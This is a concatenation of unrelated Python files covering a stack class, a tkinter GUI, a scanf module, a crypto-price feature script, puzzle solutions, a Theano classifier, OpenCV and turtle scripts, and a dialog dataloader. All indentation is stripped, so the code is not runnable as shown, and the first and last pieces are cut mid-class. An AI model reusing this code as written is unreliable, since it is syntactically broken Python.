stack = deque()
# This function pushes an element onto the stack
def pushStack(self, newElement):
self.stack.append(newElement)
return
# This function pops the element from the stack
def popStack(self):
# Error Flag
errorFlag = False
# Check if the stack is empty
if(len(self.stack)==0):
errorFlag = True
return errorFlag, self.stack
else:
return errorFlag, self.stack.pop()
# Checks if the stack is empty
def isEmpty(self):
# Check if the length of the stack is empty
if (len(self.stack)==0):
return True
else:
return False
# Returns the number of elements in the stack
def numElements(self):
return len(self.stack)
# Returns the first elements of the stack
def peekStack(self):
# Error flag
errorFlag = False
# Returns the empty stack object if the stack is empty
if(len(self.stack)==0):
return errorFlag
else:
topElement = self.stack[-1]
# Return the 'top' element at the end of the deque
return topElement
|
from tkinter import *
from PIL import ImageTk, Image
from json import *
constants = load(open('utils/constants.json'))
DEFAULT_COLOR = 'AntiqueWhite1'
class Application():
def __init__(self, parent):
self.parent = parent
self.load_images()
self.load_hud()
self.label01 = Label(text='スケジュール', bg=DEFAULT_COLOR)
self.label01.config(font=('MS Gothic', 44))
self.label01.pack(side=TOP)
self.label02 = Label(text='______________________________________________________________',
bg=DEFAULT_COLOR)
self.label02.config(font=('MS Gothic', 44))
self.label02.place(relx=-0.1, rely=0.2)
def load_hud(self):
self.parent.geometry('450x900+600+0')
self.parent['bg'] = DEFAULT_COLOR
def load_images(self):
self.yuiImage = ImageTk.PhotoImage(Image.open(constants['Yui']).resize((160, 160), Image.ANTIALIAS))
self.yuiImageLabel = Label(image=self.yuiImage, height=150,width=150,bg=DEFAULT_COLOR)
self.yuiImageLabel.image = self.yuiImage
self.yuiImageLabel.place(relx=0.3, rely=0.5)
root = Tk()
Application(root)
root.mainloop()
|
"""scanf.py: scanf-style input for Python.
Danny Yoo (dyoo@hkn.eecs.berkeley.edu)
The initial motivation for this module was based on a posting on
Python-tutor:
http://mail.python.org/pipermail/tutor/2004-July/030480.html
I haven't been able to find a nice module to do scanf-style input.
Even the Library Reference recommends regular expressions as a
substitute:
http://docs.python.org/lib/node109.html
But there appears to have been activity about this on python-list:
http://aspn.activestate.com/ASPN/Mail/Message/python-list/785450
Still, let's see if we can get a close equivalent scanf() in place.
At the least, it'll be fun for me, and it might be useful for people
who are still recovering from C. *grin*
Functions provided:
scanf(formatString) -- formatted scanning across stdin
sscanf(sourceString, formatString) -- formated scanning across strings
fscanf(sourceFile, formatString) -- formated scanning across files
The behavior of this scanf() will be slightly different from that
defined in C, because, in truth, I'm a little lazy, and am not quite
sure if people will need all of scanf's features in typical Python
programming.
But let's first show what conversions this scanf() will support.
Format strings are of the following form:
% [*] [width] [format]
where [*] and [width] are optional, and [format] is mandatory. The
optional flags modify the format.
* suppresses variable capture.
width maximum character width.
We support the following scanf conversion formats (copied from K&R):
d decimal integer.
i integer. The integer may be in octal (leading zero) or
hexadecimal (leading 0x or 0X). ## fixme
o octal integer (with or without leading zero). ## fixme
x hexadecimal integer (with or without leading 0x or 0X) ## fixme
c characters. The next input characters (default 1) are
placed at the indicated spot. The normal skip over white space
is suppressed; to read the next non-white space character, use
%1s.
s character string (not quoted).
f floating-point number with optional sign and optional decimal point.
% literal %; no assignment is made.
Literal characters can appear in the scanf format string: they must
match the same characters in the input.
There is no guarantee of what happens if calls to scanf are mixed with
other input functions. See the BUGS section below for details on this.
If the input doesn't conform to the format string, a FormatError is
raised.
Example format strings:
"%d %d" Two decimal integers.
"%d.%d.%d.%d" Four decimal integers, separated by literal periods.
The periods won't be captured.
"hello %s" Literally matches "hello" followed by any number of
spaces, followed by a captured word.
There's also an interface for calling the internal function bscanf()
that works on CharacterBuffer types, if in the future there is
something that supports getc() and ungetc() natively. There's also an
undocumented compile() function that takes format strings and returns
a function that can scan through CharacterBuffers. Ooops, I guess I
just documented it. *grin*
######################################################################
BUGS and GOTCHAS:
One major problem that I'm running into is a lack of ungetc(); it
would be nice if there were such a function in Python, but I can't
find it. I have to simulate it by using a CharacterBuffer object, but
it's not an ideal solution.
So at most, you may lose a single character to the internal buffers
maintained by this module if you use scanf(). The other two *scanf()
functions, thankfully, aren't effected by this problem, since I can
simulate ungetc() more accurately by using seek() in the other two
cases.
If you really need to get that buffered character back, you can grab
it through _STDIN.lastChar, though manually fiddling with this is not
recommended.
So use scanf() with the following caveat: unlike C's stdin(), this
version scanf() can't be interchanged with calls to other input
functions without some kind of weird side effect. We keep a
one-character buffer into stdin, so at most you might lose one
character to the internal buffers.
fscanf() is only allowed to work on things that support both read(1)
and seek(1, -1), since then I can reliably do a ungetch-like thing.
scanf("%s") can be dangerous in a hostile environment, since it's very
possible for something to pass in a huge string without spaces. So use
an explicit width instead if you can help it."""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import next
from builtins import object
import sys
from string import whitespace as WHITESPACE
from string import digits as DIGITS
__all__ = ['scanf', 'sscanf', 'fscanf']
__version__ = '1.0'
class CharacterBuffer(object):
"""A CharacterBuffer allows us to get a character, and to "unget" a
character. Abstract class"""
def getch(self):
"""Returns the next character. If there are no more characters
left in the stream, returns the empty string."""
pass # implement me!
def ungetch(self, ch):
"""Tries to put back a character. Can be called at most once
between calls to getch()."""
pass # implement me!
def scanCharacterSet(self, characterSet, maxChars=0):
"""Support function that scans across a buffer till we hit
something outside the allowable characterSet."""
return self.scanPredicate(lambda ch: ch in characterSet, maxChars)
def scanPredicate(self, predicate, maxChars=0):
"""Support function that scans across a buffer till we hit
something outside what's allowable by the predicate."""
chars = []
countChars = 0
while True:
if (maxChars != 0 and countChars >= maxChars):
break
ch = self.getch()
if ch != '' and predicate(ch):
chars.append(ch)
countChars += 1
else:
self.ungetch(ch)
break
return ''.join(chars)
class CharacterBufferFromIterable(CharacterBuffer):
"""Implementation of CharacterBuffers for iterable things.
We keep a 'lastChar' attribute to simulate ungetc()."""
def __init__(self, iterable):
self.iterator = iter(iterable)
self.lastChar = ''
def getch(self):
if self.lastChar == '':
try:
return next(self.iterator)
except StopIteration:
return ''
else:
(ch, self.lastChar) = (self.lastChar, '')
return ch
def ungetch(self, ch):
self.lastChar = ch
class CharacterBufferFromFile(CharacterBuffer):
"""Implementation of CharacterBuffers for files. We use the native
read(1) and seek() calls, so we don't have to do so much magic.
Note that since we want to be compatible with StringIO and text-mode
file objects, we can't use relative seek - only absolute"""
def __init__(self, myfile):
self.myfile = myfile
self.lastPos = None
def getch(self):
self.lastPos = self.myfile.tell()
return self.myfile.read(1)
def ungetch(self, ch):
if self.lastPos is None:
raise RuntimeError("can not ungetch twice in a row, or before"
" getch is called once")
self.myfile.seek(self.lastPos, 0)
self.lastPos = None
def readiter(inputFile, *args):
"""Returns an iterator that calls read(*args) on the inputFile."""
while True:
ch = inputFile.read(*args)
if ch:
yield ch
else:
return
def isIterable(thing):
"""Returns true if 'thing' looks iterable."""
try:
iter(thing)
except TypeError:
return False
return True
def isFileLike(thing):
"""Returns true if thing looks like a file."""
# Note that we don't rely on relative seek, as StringIO and text-mode
# file objects don't support it anymore (since they read unicode, not bytes)
if hasattr(thing, "read") and hasattr(thing, "seek") \
and hasattr(thing, "tell"):
try:
start = thing.tell()
thing.read(1)
thing.seek(start, 0)
if thing.tell() != start:
# If we're still not back at start, hard-error, because
# our test has messed up the buffer
raise RuntimeError("object seemed to implement seek, but"
" could not reset back to start position")
return True
except IOError:
pass
return False
def makeCharBuffer(thing):
"""Try to coerse 'thing' into a CharacterBuffer. 'thing' can be
an instance of:
1. CharacterBuffer
2. A file-like object,
3. An iterable.
makeCharBuffer() will make guesses in that order.
"""
if isinstance(thing, CharacterBuffer):
return thing
elif isFileLike(thing):
# this check must come before isIterable, since files
# provide a line-based iterator that we don't want to use.
# Plus we want to take advantage of file.seek()
return CharacterBufferFromFile(thing)
elif isIterable(thing):
return CharacterBufferFromIterable(thing)
else:
raise ValueError("Can't coerse %r to CharacterBuffer" % thing)
class CappedBuffer(CharacterBuffer):
"""Implementation of a buffer that caps the number of bytes we can
getch(). The cap may or may not include whitespace characters."""
def __init__(self, buffer, width, ignoreWhitespace=False):
self.buffer = buffer
self.bytesRead = 0
self.width = width
self.ignoreWhitespace = ignoreWhitespace
def getch(self):
if self.bytesRead < self.width:
nextChar = self.buffer.getch()
if not self.isIgnoredChar(nextChar):
self.bytesRead += len(nextChar)
return nextChar
else:
return ''
def isIgnoredChar(self, ch):
return self.ignoreWhitespace and isWhitespaceChar(ch)
def ungetch(self, ch):
self.buffer.ungetch(ch)
if not self.isIgnoredChar(ch):
self.bytesRead -= len(ch)
# make sure wacky things don't happen when ungetch()ing.
assert self.bytesRead >= 0
class FormatError(ValueError):
"""A FormatError is raised if we run into errors while scanning
for input."""
pass
class IncompleteCaptureError(ValueError):
"""The *scanf() functions raise IncompleteCaptureError if a problem
occurs doing scanning."""
pass
try:
"""We keep a module-level STDIN CharacterBuffer, so that we can call
scanf() several times and not lose characters between invocations."""
_STDIN = CharacterBufferFromIterable(sys.stdin)
def scanf(formatString):
"""scanf(formatString) -> tuple
Scans standard input for formats specified in the formatString. See
module's docs for list of supported format characters."""
return bscanf(_STDIN, formatString)
except:
TypeError
def sscanf(inputString, formatString):
"""sscanf(inputString, formatString) -> tuple
Scans inputString for formats specified in the formatString. See
module's docs for list of supported format characters."""
return bscanf(CharacterBufferFromIterable(inputString), formatString)
def fscanf(inputFile, formatString):
"""fscanf(inputFile, formatString) -> tuple
Scans inputFile for formats specified in the formatString. See
module's docs for list of supported format characters."""
buffer = CharacterBufferFromFile(inputFile)
return bscanf(buffer, formatString)
def bscanf(buffer, formatString):
"""fscanf(buffer, formatString) -> tuple
Scans a CharacterBuffer 'buffer' for formats specified in the
formatString. See scanf module's docs for list of supported format
characters."""
# TODO: we may want to do some caching here of compiled formatStrings,
# similar to that of the 're' module.
parser = compile(formatString)
return parser(buffer)
def isWhitespaceChar(ch, _set=set(WHITESPACE)):
"""Returns true if the charcter looks like whitespace.
We follow the definition of C's isspace() function.
"""
return ch in _set
def handleWhitespace(buffer):
"""Scans for whitespace. Returns all the whitespace it collects."""
chars = []
while True:
ch = buffer.getch()
if isWhitespaceChar(ch):
chars.append(ch)
else:
buffer.ungetch(ch)
break
return ''.join(chars)
# We keep a few sets as module variables just to incur the cost of
# constructing them just once.
_PLUS_MINUS_SET = set("+-")
_DIGIT_SET = set(DIGITS)
_OCT_SET = set("01234567")
_HEX_SET = set("0123456789ABCDEFabcdef")
def handleDecimalInt(buffer, optional=False, allowLeadingWhitespace=True):
"""Tries to scan for an integer. If 'optional' is set to False,
returns None if an integer can't be successfully scanned."""
if allowLeadingWhitespace:
handleWhitespace(buffer) # eat leading spaces
chars = []
chars += buffer.scanCharacterSet(_PLUS_MINUS_SET, 1)
chars += buffer.scanCharacterSet(_DIGIT_SET)
try:
return int(''.join(chars), 10)
except ValueError:
if optional:
return None
raise FormatError("invalid literal characters: %s" % ''.join(chars))
def handleOct(buffer):
chars = []
chars += buffer.scanCharacterSet(_PLUS_MINUS_SET)
chars += buffer.scanCharacterSet(_OCT_SET)
try:
return int(''.join(chars), 8)
except ValueError:
raise FormatError("invalid literal characters: %s" % ''.join(chars))
def handleInt(buffer, base=0):
chars = []
chars += buffer.scanCharacterSet(_PLUS_MINUS_SET)
chars += buffer.scanCharacterSet("0")
if chars and chars[-1] == '0':
chars += buffer.scanCharacterSet("xX")
chars += buffer.scanCharacterSet(_HEX_SET)
try:
return int(''.join(chars), base)
except ValueError:
raise FormatError("invalid literal characters: %s" % ''.join(chars))
def handleHex(buffer):
return handleInt(buffer, 16)
def handleFloat(buffer, allowLeadingWhitespace=True):
if allowLeadingWhitespace:
handleWhitespace(buffer) # eat leading whitespace
chars = []
chars += buffer.scanCharacterSet(_PLUS_MINUS_SET)
chars += buffer.scanCharacterSet(_DIGIT_SET)
chars += buffer.scanCharacterSet(".")
chars += buffer.scanCharacterSet(_DIGIT_SET)
chars += buffer.scanCharacterSet("eE")
chars += buffer.scanCharacterSet(_PLUS_MINUS_SET)
chars += buffer.scanCharacterSet(_DIGIT_SET)
try:
return float(''.join(chars))
except ValueError:
raise FormatError("invalid literal characters: %s" % ''.join(chars))
def handleChars(buffer,
allowLeadingWhitespace=False,
isBadCharacter=lambda ch: False,
optional=False):
"""Read as many characters are there are in the buffer."""
if allowLeadingWhitespace:
handleWhitespace(buffer)
chars = []
chars += buffer.scanPredicate(lambda ch: not isBadCharacter(ch))
if chars:
return ''.join(chars)
else:
if optional:
return None
raise FormatError(("Empty buffer."))
def handleString(buffer, allowLeadingWhitespace=True):
"""Reading a string format is just an application of reading
characters (skipping leading spaces, and reading up to space)."""
return handleChars(buffer,
allowLeadingWhitespace=allowLeadingWhitespace,
isBadCharacter=isWhitespaceChar)
def makeHandleLiteral(literal):
def f(buffer, optional=False):
ch = buffer.getch()
if ch == literal:
return ch
else:
buffer.ungetch(ch)
if optional:
return None
raise FormatError("%s != %s" % (literal, ch))
return f
def makeWidthLimitedHandler(handler, width, ignoreWhitespace=False):
"""Constructs a Handler that caps the number of bytes that can be read
from the byte buffer."""
def f(buffer):
return handler(CappedBuffer(buffer, width, ignoreWhitespace))
return f
"""Just for kicks: handleChar is a handler for a single character."""
handleChar = makeWidthLimitedHandler(handleChars, 1, ignoreWhitespace=False)
def makeIgnoredHandler(handler):
def f(buffer):
handler(buffer)
return None
return f
class CompiledPattern(object):
def __init__(self, handlers, formatString):
self.handlers = handlers
self.formatString = formatString
def __call__(self, buffer):
results = []
try:
for h in self.handlers:
value = h(buffer)
# We use None as the sentinel value that ignored handlers
# will emit.
if value is not None:
results.append(value)
return tuple(results)
except FormatError as e:
raise IncompleteCaptureError(e, tuple(results))
def __repr__(self):
return "compile(%r)" % self.formatString
def compile(formatString):
"""Given a format string, emits a new CompiledPattern that eats
CharacterBuffers and returns captured values as a tuple.
If there's a failure during scanning, raises IncompleteCaptureError,
with args being a two-tuple of the FormatError, and the results that
were captured before the error occurred.
"""
handlers = []
formatBuffer = CharacterBufferFromIterable(formatString)
while True:
ch = formatBuffer.getch()
if ch == '':
break
if isWhitespaceChar(ch):
handleWhitespace(formatBuffer)
handlers.append(makeIgnoredHandler(handleWhitespace))
elif ch == '%':
handlers.append(_compileFormat(formatBuffer))
else:
handlers.append(makeIgnoredHandler(makeHandleLiteral(ch)))
return CompiledPattern(handlers, formatString)
def _compileFormat(formatBuffer):
def readOptionalSuppression():
f = makeHandleLiteral("*")
return f(formatBuffer, optional=True) == "*"
def readOptionalWidth():
return handleDecimalInt(formatBuffer,
optional=True,
allowLeadingWhitespace=False)
def readFormat():
return formatBuffer.getch() # Finally, read the format
suppression = readOptionalSuppression()
width = readOptionalWidth()
formatCh = readFormat()
handler = makeFormattedHandler(suppression, width, formatCh)
if handler:
return handler
else:
# At this point, since we couldn't figure out the format, die loudly.
raise FormatError("Invalid format character %s" % formatCh)
_FORMAT_HANDLERS = {'d': handleDecimalInt,
'i': handleInt,
'x': handleHex,
'o': handleOct,
's': handleString,
'f': handleFloat,
'%': makeIgnoredHandler(makeHandleLiteral('%'))
}
def makeFormattedHandler(suppression, width, formatCh):
"""Given suppression, width, and a formatType, returns a function
that eats a buffer and returns that thing."""
def applySuppression(handler):
if suppression:
return makeIgnoredHandler(handler)
return handler
def applyWidth(handler):
if width != None:
return makeWidthLimitedHandler(handler, width,
ignoreWhitespace=True)
return handler
# 'c' is a special case: it's the only handler that can't ignore
# whitespace.
if formatCh == 'c':
if width == None:
return applySuppression(handleChar)
else:
return applySuppression(
makeWidthLimitedHandler(handleChars, width,
ignoreWhitespace=False))
if formatCh in _FORMAT_HANDLERS:
return applySuppression(applyWidth(_FORMAT_HANDLERS[formatCh]))
else:
return None
|
from binance.client import Client
import pandas as pd
import os
import matplotlib.pyplot as plt
import numpy as np
from sklearn import preprocessing
import talib
from pytrends.request import TrendReq
class Features():
API, API_SECRET = '', ''
FEATURE_LIST = {
"price_change" : ['1','2','4','6','12','24','48','96']
}
def __init__(self):
with open('../metadata/binance_keys.txt') as f:
keys = f.read()
keys = keys.split(',')
Features.API, Features.API_SECRET = keys[0], keys[1]
self.client = Client(Features.API, Features.API_SECRET)
# filename = '../dataset_files/price_moves/hour/ADABNB.csv'
# self.data = pd.read_csv(filename, index_col=0)
# self.close = self.data.Close
# features_df = pd.DataFrame()
# self.get_price_change()
self.read_google_trends()
def get_price_change(self):
df = pd.DataFrame()
df['close'] = self.close
for change in Features.FEATURE_LIST['price_change']:
change = int(change)
if int(change) / 24 >= 1:
name = change / 24
name = str(int(name))+'D'
else:
name = str(change)+'H'
df[f'{name}_change'] = (self.close-self.close.shift(change)) / self.close.shift(change)
print(df)
def big_price_move(self):
pass
def read_google_trends(self):
google_df = pd.read_csv('dock_trends.csv', index_col=0)
google_df['trends'] = google_df['dock coin: (Worldwide)']
google_df.index = google_df.index.str.replace('T', ' ')
google_df.index = google_df.index.str[:-6]
google_df = google_df[:-1]
google_df.index = pd.to_datetime(google_df.index, infer_datetime_format=True)
ema_trends = talib.EMA(google_df.trends, timeperiod=16)
price_df = self.get_price_temp()
# + pd.DateOffset(minutes=4)
trun_time = google_df.index[0]
print(google_df.index[0])
price_df.index = pd.to_datetime(price_df.index, infer_datetime_format=True, unit='s')
price_df = price_df.truncate(before = trun_time)
price_df= price_df.resample('8T').sum()
print(price_df.index)
print(ema_trends.index)
# y2 = min_max_scaler.fit_transform(df_google.values)
# plt.plot(price_df.index, price_df.close, ema_trends, 'r--')
# plt.xticks(rotation='vertical')
# plt.show()
fig, ax1 = plt.subplots()
t = price_df.index
s1 = price_df.close
ax1.plot(t, s1, 'b-')
ax1.set_xlabel('Date hour (h)')
# Make the y-axis label, ticks and tick labels match the line color.
ax1.set_ylabel('Close prices', color='b')
ax1.tick_params('y', colors='b')
ax2 = ax1.twinx()
s2 = google_df.trends
ax2.plot(t, s2, 'r-')
ax2.set_ylabel('Google Trends 7 EMA', color='r')
ax2.tick_params('y', colors='r')
fig.tight_layout()
plt.show()
def get_price_temp(self):
pair = 'DOCKBTC'
if os.path.exists(f'{pair}.csv'):
df = pd.read_csv(f'{pair}.csv', index_col=0)
return df
else:
df = pd.DataFrame()
print(f'Getting price data for {pair}')
column_list = ['date','open','high','low','close','volume']
price_data = self.client.get_historical_klines(pair, Client.KLINE_INTERVAL_1MINUTE, "1 day ago UTC")
for index, col in enumerate(column_list):
if col == 'date':
df['date'] = [int(entry[0]/1000)+3600 for entry in price_data]
continue
df[col] = [entry[index] for entry in price_data]
df[col] = df[col].astype('float64')
df.set_index('date', inplace=True)
print('Finished. Saving to csv')
df.to_csv(f'{pair}.csv')
return df
x = Features() |
while True:
quantidade = int(input())
if quantidade == 0:
break
suspeitos = list(map(int, input().split()))
indice_maior = suspeitos.index(max(suspeitos))
suspeitos[indice_maior] = 0
assassino = suspeitos.index(max(suspeitos)) + 1
print(assassino)
|
import extractText
url = "https://cdn.fbsbx.com/v/t59.2708-21/87471654_129388618504729_4629126029485539328_n.pdf/CV-Flipkart.pdf?_nc_cat=110&_nc_sid=0cab14&_nc_oc=AQmqQ1glOGXLTCOlUaMTUHrjtDyFhRlEr_TNHzZlIny6O51sy_pbl-gqEohpXZGLw37PJWaDfb9Td03XJKmPKcNK&_nc_ht=cdn.fbsbx.com&oh=f673186b4a1ad7e03d357c4e2aacde8a&oe=5E6068CC"
extractText.downloadFile(url,"file")
|
from codecs import open
from os import path
from setuptools import Extension, find_packages, setup
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='search_in_files',
version='0.0.6',
description='A tool for find text in files.',
long_description=long_description,
url='https://github.com/danielgatis/search_in_files',
author='Daniel Gatis',
author_email='danielgatis@gmail.com',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
],
keywords='python file-search text-search fast',
setup_requires=['cython'],
install_requires=['six'],
packages = find_packages(exclude=['notebooks']),
ext_modules=[
Extension(
'search_in_files.csearch',
sources=['search_in_files/csearch.pyx'],
),
],
entry_points={
'console_scripts': [
'search_in_files = search_in_files.search:main'
]
},
)
|
import streamlit as st
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
def info():
df = pd.read_csv('data/happiness_combined_year copy 2.csv')
df = df.drop(columns=['Unnamed: 0'],axis=1)
avg = df.groupby(['Country']).mean().sort_values(by='Happiness Score',ascending=False).reset_index()
avg.plot('Country','Generosity')
plt.title("Average Generosity Country-wise")
st.pyplot()
avg.plot('Country','Trust (Government Corruption)')
plt.title("Average Government Corruption Country-wise")
st.pyplot()
avg.plot('Country','Freedom')
plt.title("Average Freedom Country-wise")
st.pyplot()
avg.plot('Country','Economy (GDP per Capita)')
plt.title("Average GDP Country-wise")
st.pyplot()
avg.plot('Country','Health (Life Expectancy)')
plt.title("Average Life Expectancy Country-wise")
st.pyplot()
avg.plot('Country','Family')
plt.title("Average Social Support Country-wise")
st.pyplot()
def load_page():
st.markdown("<h1 style='text-align: center;'>Average Based Analysis</h1>", unsafe_allow_html=True)
info()
if __name__ == "__main__":
load_page()
|
def topla(*sayilar):
toplam = 0
for sayi in sayilar:
toplam += sayi
return toplam
print("Sayıların Toplamı :", topla(1, 3, 5, 7, 10, 15, 20, 65, 15))
|
import pandas as pd
import matplotlib.pyplot as plt
import statsmodels.graphics.tsaplots as tsplots
import statsmodels.tsa.arima.model as arma
import numpy as np
import helper_functions_4
import statsmodels.formula.api as smf
import statsmodels.tsa.stattools as stats
def main():
# data is a dataframe, first column is year, second column is GDP
data = pd.read_csv('./data.csv', delimiter=',',
names=['obs', 'cons', 'inc', 'time'], skiprows=1)
data['datetime'] = pd.to_datetime(data['obs'])
print()
# opdracht2(data)
# opdracht4(data)
# opdracht5(data)
# plot acf and pacf
def opdracht2(data):
pass
# acf and pacf apple
# tsplots.plot_acf(data['apple'].values, lags=12, zero=False, title="Autocorrelation Apple")
# tsplots.plot_pacf(data['apple'].values, lags=12, zero=False, title="Partial Autocorrelation Apple")
# plt.show()
#
# acf and pacf netflix
# tsplots.plot_acf(data['netflix'].values, lags=12, zero=False, title="Autocorrelation Netflix")
# tsplots.plot_pacf(data['netflix'].values, lags=12, zero=False, title="Partial Autocorrelation Netflix")
# plt.show()
if __name__ == '__main__':
main()
|
import numpy
import theano
import theano.tensor as T
import TP1
rng = numpy.random
def escala_gris(img):
return numpy.dot(img,[0.3333,0.3333,0.3333]) # Media de los 3 canales
def procesar_imagen(img):
img = TP1.normalize(img)
img = TP1.resize_image(img,28)
img = escala_gris(img)
return img.flatten()
aviones = TP1.get_images_clase("airplanes")
aviones_cl = [0] * len(aviones)
motos = TP1.get_images_clase("Motorbikes")
motos_cl = [1] * len(motos)
numpy.random.shuffle(aviones)
numpy.random.shuffle(motos)
NTest = 200; # Por clase
test = aviones[-NTest:] + motos[-NTest:]
test_cl = aviones_cl[-NTest:] + motos_cl[-NTest:]
aviones = aviones[:-NTest]
motos = motos[:-NTest]
aviones_cl = aviones_cl[:-NTest]
motos_cl = motos_cl[:-NTest]
merged = list(map(procesar_imagen,aviones+motos))
test = list(map(procesar_imagen,test))
D = (merged, aviones_cl + motos_cl)
Tst = (test, test_cl)
N = len(D)
training_steps = 10000
feats = 784 # number of input variables
# Declare Theano symbolic variables
x = T.dmatrix("x")
y = T.dvector("y")
# initialize the weight vector w randomly
#
# this and the following bias variable b
# are shared so they keep their values
# between training iterations (updates)
w = theano.shared(rng.randn(feats), name="w")
# initialize the bias term
b = theano.shared(0., name="b")
print("Initial model:")
print(w.get_value())
print(b.get_value())
# Construct Theano expression graph
p_1 = 1 / (1 + T.exp(-T.dot(x, w) - b)) # Probability that target = 1
prediction = p_1 > 0.5 # The prediction thresholded
xent = -y * T.log(p_1) - (1-y) * T.log(1-p_1) # Cross-entropy loss function
cost = xent.mean() + 0.01 * (w ** 2).sum()# The cost to minimize
gw, gb = T.grad(cost, [w, b]) # Compute the gradient of the cost
# w.r.t weight vector w and
# bias term b
# (we shall return to this in a
# following section of this tutorial)
# Compile
train = theano.function(
inputs=[x,y],
outputs=[prediction, xent],
updates=((w, w - 0.1 * gw), (b, b - 0.1 * gb)))
predict = theano.function(inputs=[x], outputs=prediction)
# Train
for i in range(training_steps):
pred, err = train(D[0], D[1])
print("Final model:")
print(w.get_value())
print(b.get_value())
print("target values for D:")
print(D[1])
print("prediction on D:")
print(predict(D[0]))
print("predcition on T:")
pred = predict(Tst[0])
print(pred)
print("Correcto (%): ")
print(sum(pred == Tst[1])*100/len(Tst[1]))
|
import turtle
turtle.setpos(-400, 0)
pen = turtle.Pen()
print(" Para criarmos o mosaico desejado, precisamos de O-O-O-O como \
codigo de entrada, e O yo-pO+xO+bOoO-rO-gO+bO como regra. Além de 4 Repetições ")
inicio = str(input("Digite o código de entrada: "))
regra = str(input("Digite a regra desejada: "))
rep = int(input("Digite o número de repetições desejado: "))
final = "" # codigo final será uma string na qual converteremos em movimentos
regra = regra.split(" ") #split para podermos analisar cada caracter
i = 0
while i < rep: #obtendo o codigo final a partir da regra e do codigo inicial
final = inicio.replace(regra[0], regra[1])
inicio = final
i+=1
turtle.pencolor("red")
#conversão
for i in final.upper():
if i == "O":
turtle.pendown()
turtle.forward(10)
elif i == "-":
turtle.right(90)
elif i == "+":
turtle.left(90)
elif i == "*":
turtle.right(60)
elif i == "/":
turtle.left(60)
turtle.speed('fastest')
# O-O-O-O
# O yo-pO+xO+bOoO-rO-gO+bO
#
|
def checkio(n):
return feed(n, 1, 0)
def feed(n, pigeon, last):
if n <= last:
return last
if n <= pigeon:
return n
return feed(n - pigeon, 2 * pigeon - last + 1, pigeon)
if __name__ == '__main__':
assert checkio(0) == 0, 0
assert checkio(1) == 1, 1
assert checkio(2) == 1, 2
assert checkio(5) == 3, 5
assert checkio(10) == 6, 10
print('All OK')
|
class Solution(object):
def permuteUnique(self, nums):
"""
:type nums: List[int]
:rtype: List[List[int]]
"""
res = self.nonRecursive(nums)
return res
def recursive(self, nums, i, res):
if i >= len(nums):
res.append(nums[:])
return
self.recursive(nums, i + 1, res)
for v in range(i + 1, len(nums)):
if nums[v] == nums[i]:
continue
nums[v], nums[i] = nums[i], nums[v]
self.recursive(nums, i + 1, res)
nums[i], nums[v] = nums[v], nums[i]
def nonRecursive(self, nums):
res = []
nums.sort()
while True:
res.append(nums[:])
p = len(nums) - 1
while p > 0 and nums[p] <= nums[p - 1]: ## < change to <=
p -= 1
if p == 0:
break
print("0",nums)
q = len(nums) - 1
swap = p - 1
while q > swap and nums[q] <= nums[swap]: ##< change to <=
q -= 1
nums[q], nums[swap] = nums[swap], nums[q]
print("1",nums)
q = len(nums) - 1
while p < q:
nums[p], nums[q] = nums[q], nums[p]
p += 1
q -= 1
print("2",nums)
return res
test = [1,1,2]
a=Solution()
print(a.permuteUnique(test)) |
from itertools import permutations
def lexicographical_combos(word, rank):
perm = sorted(''.join(chars) for chars in permutations(word))
return(perm[rank-1])
n = int(input())
while n:
word, rank = input().split()
print(lexicographical_combos(word, int(rank)))
n -= 1
|
import cv2
import numpy as np
from matplotlib import pyplot as plt
rgb_min_blue = np.uint8([[[50, 50, 200]]])
rgb_max_blue = np.uint8([[[100,0,255 ]]])
# hsv_min = np.array([110,50,50])
# hsv_max = np.array([130,255,255])
hsv_max = cv2.cvtColor(rgb_max_blue,cv2.COLOR_BGR2HSV)
hsv_min = cv2.cvtColor(rgb_min_blue,cv2.COLOR_BGR2HSV)
# hsv_max = np.array([130,30,30])
# hsv_min = np.array([130,255,255])
cap = cv2.VideoCapture(1)
ret, img = cap.read()
# img = cv2.imread('122_H_0deg.jpg')
hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv_img, hsv_min, hsv_max)
res = cv2.bitwise_and(img,img, mask= mask)
# plt.imshow(mask)
# plt.imshow(res)
plt.imshow(res)
plt.show()
# TODO: I think we might have to upgrade opencv for this to work
# cv2.imshow('mask', mask)
# cv2.imshow('res', res)
# k = cv2.waitKey(5) & 0xFF
# if k == 27:
# break
# plt.imshow(img)
# plt.xticks([]), plt.yticks([]) # to hide tick values on X and Y axis
# plt.plot([200,300,400],[100,200,300],'c', linewidth=5)
# plt.show()
|
import random
import csv
import numpy as np
from collections import Counter
from itertools import chain
from .dataloader import Dataloader
from ..metric import MetricChain, PerlplexityMetric, BleuCorpusMetric, SingleDialogRecorder
from .._utils import trim_before_target
class MultiTurnDialog(Dataloader):
r"""Base class for multi-turn dialog datasets. This is an abstract class.
Arguments:
ext_vocab (list): special tokens. default: `["<pad>", "<unk>", "<go>", "<eos>", "<eot>"]`
key_name (list): name of subsets of the data. default: `["train", "dev", "test"]`
Attributes:
ext_vocab (list): special tokens, be placed at beginning of `vocab_list`.
For example: `["<pad>", "<unk>", "<go>", "<eos>", "<eot>"]`
pad_id (int): token for padding, always equal to `0`
unk_id (int): token for unkown words, always equal to `1`
go_id (int): token at the beginning of sentences, always equal to `2`
eos_id (int): token at the end of sentences, always equal to `3`
eot_id (int): token at the end of turns, always equal to `4`
key_name (list): name of subsets of the data. For example: `["train", "dev", "test"]`
vocab_list (list): vocabulary list of the datasets.
word2id (dict): a dict mapping tokens to index.
Maybe you want to use :meth:`sen_to_index` instead.
"""
def __init__(self, \
ext_vocab=None, \
key_name=None, \
):
super().__init__()
# initialize by default value. (can be overwritten by subclass)
self.ext_vocab = ext_vocab or ["<pad>", "<unk>", "<go>", "<eos>", "<eot>"]
self.pad_id = self.ext_vocab.index("<pad>")
self.unk_id = self.ext_vocab.index("<unk>")
self.go_id = self.ext_vocab.index("<go>")
self.eos_id = self.ext_vocab.index("<eos>")
self.eot_id = self.ext_vocab.index("<eot>")
self.key_name = key_name or ["train", "dev", "test"]
# initialize by subclass
